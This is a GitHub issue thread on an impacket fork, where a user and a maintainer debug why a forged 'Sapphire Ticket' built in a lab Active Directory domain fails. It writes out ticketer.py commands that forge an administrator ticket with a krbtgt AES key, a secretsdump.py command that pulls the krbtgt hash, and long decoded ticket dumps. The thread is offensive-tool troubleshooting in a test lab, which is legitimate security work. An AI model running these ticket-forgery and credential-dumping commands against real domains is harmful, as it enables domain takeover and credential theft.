Closed Cyb3rGh0st786 closed 1 year ago
@ShutdownRepo FYI
The PAC_ATTRIBUTES_INFO and PAC_REQUESTOR_INFO structures seem to be missing from your ticket; it's probably the cause of your error, as per https://github.com/fortra/impacket/issues/1390 and https://github.com/fortra/impacket/pull/1545
But the changes have been merged, so I don't know why you don't have those new structures in your PAC.
If you're able to obtain a ticket for normaldomainuser, describe it, and see if the structures are in his ticket, it'd be awesome.
@ShutdownRepo ,
Here is what I have done. userone is my normal domain user account, and I have tried to impersonate this user:
ticketer.py -request -impersonate 'userone' -domain 'adlab.com' -user 'userone' -password 'mypassword' -aesKey 'mykrbtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'userone' -debug
describeTicket.py ./userone.ccache -u "userone" --aes "krbtgtaeskey" -d adlab.com
Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 665274625a666351596166594e5375694c666a766e76724958464466786e5377
[*] User Name : userone
[*] User Realm : ADLAB.COM
[*] Service Name : krbtgt/ADLAB.COM
[*] Service Realm : ADLAB.COM
[*] Start Time : 06/09/2023 15:28:57 PM
[*] End Time : 07/09/2023 01:28:57 AM
[*] RenewTill : 07/09/2023 15:28:57 PM
[*] Flags : (0x50e50000) forwardable, proxiable, renewable, initial, pre_authent, ok_as_delegate, enc_pa_rep
[*] KeyType : aes256_cts_hmac_sha1_96
[*] Base64(key) : ZlJ0YlpmY1FZYWZZTlN1aUxmanZudnJJWEZEZnhuU3c=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/adlab.com
[*] Service Realm : ADLAB.COM
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*] LoginInfo
[*] Logon Time : 06/09/2023 11:28:57 AM
[*] Logoff Time : Infinity (absolute time)
[*] Kickoff Time : Infinity (absolute time)
[*] Password Last Set : 10/04/2023 04:10:22 AM
[*] Password Can Change : 11/04/2023 04:10:22 AM
[*] Password Must Change : Infinity (absolute time)
[*] LastSuccessfulILogon : Infinity (absolute time)
[*] LastFailedILogon : Infinity (absolute time)
[*] FailedILogonCount : 0
[*] Account Name : userone
[*] Full Name : user one
[*] Logon Script :
[*] Profile Path :
[*] Home Dir :
[*] Dir Drive :
[*] Logon Count : 426
[*] Bad Password Count : 0
[*] User RID : 1103
[*] Group RID : 513
[*] Group Count : 1
[*] Groups : 513
[*] Groups (decoded) : (513) Domain Users
[*] User Flags : (32) LOGON_EXTRA_SIDS
[*] User Session Key : 00000000000000000000000000000000
[*] Logon Server : WIN-3MBDJTT1P21
[*] Logon Domain Name : ADLAB
[*] Logon Domain SID : S-1-5-21-991381806-4095455566-2546632930
[*] User Account Control : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*] Extra SID Count : 1
[*] Extra SIDs : S-1-18-2 Service asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*] Resource Group Domain SID :
[*] Resource Group Count : 0
[*] Resource Group Ids :
[*] LMKey : 0000000000000000
[*] SubAuthStatus : 0
[*] Reserved3 : 0
[*] ClientName
[*] Client Id : 06/09/2023 11:28:57 AM
[*] Client Name : userone
[*] UpnDns
[*] Flags : (2) S_SidSamSupplied
[*] UPN : userone@adlab.com
[*] DNS Domain Name : ADLAB.COM
[*] SamAccountName : userone
[*] UserSid : S-1-5-21-991381806-4095455566-2546632930-1103
[*] ServerChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : 323030dcfb8e1b872bc06989
[*] KDCChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : f6da234e225e7febd9b55788
Please let me know if you need any further details and testing
I'd need the regular TGT for userone
Something you'd get with getTGT
@ShutdownRepo ,
Here you go
Impacket for Exegol - v0.10.1.dev1+20230828.161954.3f48a55e - Copyright 2022 Fortra - forked by ThePorgs
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : ec72f38ed852119ac094cc0a33190dcfe7a0d1e709a97b6b5e5f70a3e7aad346
[*] User Name : userone
[*] User Realm : ADLAB.COM
[*] Service Name : krbtgt/adlab.com
[*] Service Realm : ADLAB.COM
[*] Start Time : 06/09/2023 21:40:31 PM
[*] End Time : 07/09/2023 07:40:31 AM
[*] RenewTill : 07/09/2023 21:40:32 PM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : aes256_cts_hmac_sha1_96
[*] Base64(key) : 7HLzjthSEZrAlMwKMxkNz+eg0ecJqXtrXl9wo+eq00Y=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/adlab.com
[*] Service Realm : ADLAB.COM
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[*] Decoding credential[0]['ticket']['enc-part']:
[*] LoginInfo
[*] Logon Time : 06/09/2023 17:36:37 PM
[*] Logoff Time : Infinity (absolute time)
[*] Kickoff Time : Infinity (absolute time)
[*] Password Last Set : 06/09/2023 17:40:02 PM
[*] Password Can Change : 07/09/2023 17:40:02 PM
[*] Password Must Change : Infinity (absolute time)
[*] LastSuccessfulILogon : Infinity (absolute time)
[*] LastFailedILogon : Infinity (absolute time)
[*] FailedILogonCount : 0
[*] Account Name : userone
[*] Full Name : user one
[*] Logon Script :
[*] Profile Path :
[*] Home Dir :
[*] Dir Drive :
[*] Logon Count : 428
[*] Bad Password Count : 1
[*] User RID : 1103
[*] Group RID : 513
[*] Group Count : 1
[*] Groups : 513
[*] Groups (decoded) : (513) Domain Users
[*] User Flags : (32) LOGON_EXTRA_SIDS
[*] User Session Key : 00000000000000000000000000000000
[*] Logon Server : WIN-3MBDJTT1P21
[*] Logon Domain Name : ADLAB
[*] Logon Domain SID : S-1-5-21-991381806-4095455566-2546632930
[*] User Account Control : (8720) USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD, USER_TRUSTED_FOR_DELEGATION
[*] Extra SID Count : 1
[*] Extra SIDs : S-1-18-1 Authentication authority asserted identity (SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, SE_GROUP_ENABLED)
[*] Resource Group Domain SID :
[*] Resource Group Count : 0
[*] Resource Group Ids :
[*] LMKey : 0000000000000000
[*] SubAuthStatus : 0
[*] Reserved3 : 0
[*] ServerChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : 493b020c12ca0ee59a8ca947
[*] KDCChecksum
[*] Signature Type : hmac_sha1_96_aes256
[*] Signature : 06a9f66bc1ec98cfc43d1f4e
[*] ClientName
[*] Client Id : 06/09/2023 17:40:31 PM
[*] Client Name : userone
[*] UpnDns
[*] Flags : (2) S_SidSamSupplied
[*] UPN : userone@adlab.com
[*] DNS Domain Name : ADLAB.COM
[*] SamAccountName : userone
[*] UserSid : S-1-5-21-991381806-4095455566-2546632930-1103
[*] Attributes Info
[*] Flags : (1) PAC_WAS_REQUESTED
[*] Requestor Info
[*] UserSid : S-1-5-21-991381806-4095455566-2546632930-1103
userone.ccache.zip: I also added the ccache file, which I got from getTGT, for your reference. Remove the .zip extension.
That's what I thought: the PAC_ATTRIBUTES_INFO and PAC_REQUESTOR structures are in the original userone's TGT and are not in the ticket produced with ticketer for some reason, which indicates that the issue is probably located around here:
https://github.com/fortra/impacket/blob/d7b5e3704e090ed90c4ef8e038bdd5642b65e4f5/examples/ticketer.py#L652-L662
I won't be able to debug that just yet; would you be able to try debugging and find out where the problem is happening?
Sure, I will give it a try
So, from the tests we made together with @kaleemshaik7867 today, what's happening is Sapphire Ticket takes an initial ticket's PAC and "copies" it into a new one. The initial ticket is obtained through S4U2self + U2U.
This initial PAC is missing the two PAC blobs PAC_ATTRIBUTES_INFO and PAC_REQUESTOR, that's why they are missing from the final ticket.
If we obtain the initial ticket manually (getTGT user1, getST -u2u -self -impersonate user2) the result is the same.
Nota bene: user1's TGT is not missing the two structures, meaning the structures go missing in the getST process.
This means that there is either an issue in how the ticket is requested through getST with S4U2self+U2U (a flag missing for instance, or anything that tells the DCs not to include the new structures), or there is a problem with the environment (the DC fails to produce a service ticket with the new structures, which is unlikely).
Next step: understand what's wrong with the ST request
Additional testing indicates that the structures go missing after a regular ST request with getST.py, so if something's wrong with getST.py, it's not only with S4U2self + U2U. Maybe those structures are meant to go away in a service ticket, which I don't think is the reason because afaik, a TGT's PAC is copy-pasted in a service ticket when a user asks for an ST 🤷
This issue can be closed. I figured it out and pushed fixes. Enforced KB5008380 was the root cause.
Thank you, @ShutdownRepo, for your exceptional support in closing the issue.
Glad we sorted it out, thank you for the great help
Configuration
impacket version: 0.10.1.dev1+20230828.161954.3f48a55e
Python version: 3.11.4
Target OS: Kali Linux
I tried to create a sapphire ticket using ticketer.py. The ccache file has been created, but when I try to use it with wmiexec.py or secretsdump.py, I get an error saying TGT revoked
Ticketer command
ticketer.py -request -impersonate 'administrator' -domain 'adlab.com' -user 'normaldomainuser' -mypassword' -aesKey 'Krgtgtaeskey' -domain-sid 'S-1-5-21-991381806-4095455566-2546632930' -dc-ip 192.168.126.200 'administrator' -debug
Debug info attached
Debug info.txt
Export the cache file
export KRB5CCNAME=~/Desktop/tools/impacket-theporgs/administrator.ccache
Secretsdump
secretsdump.py adlab.com/administrator@192.168.126.200 -dc-ip 192.168.126.200 -just-dc-user krbtgt -k -no-pass -debug
Describe the ticket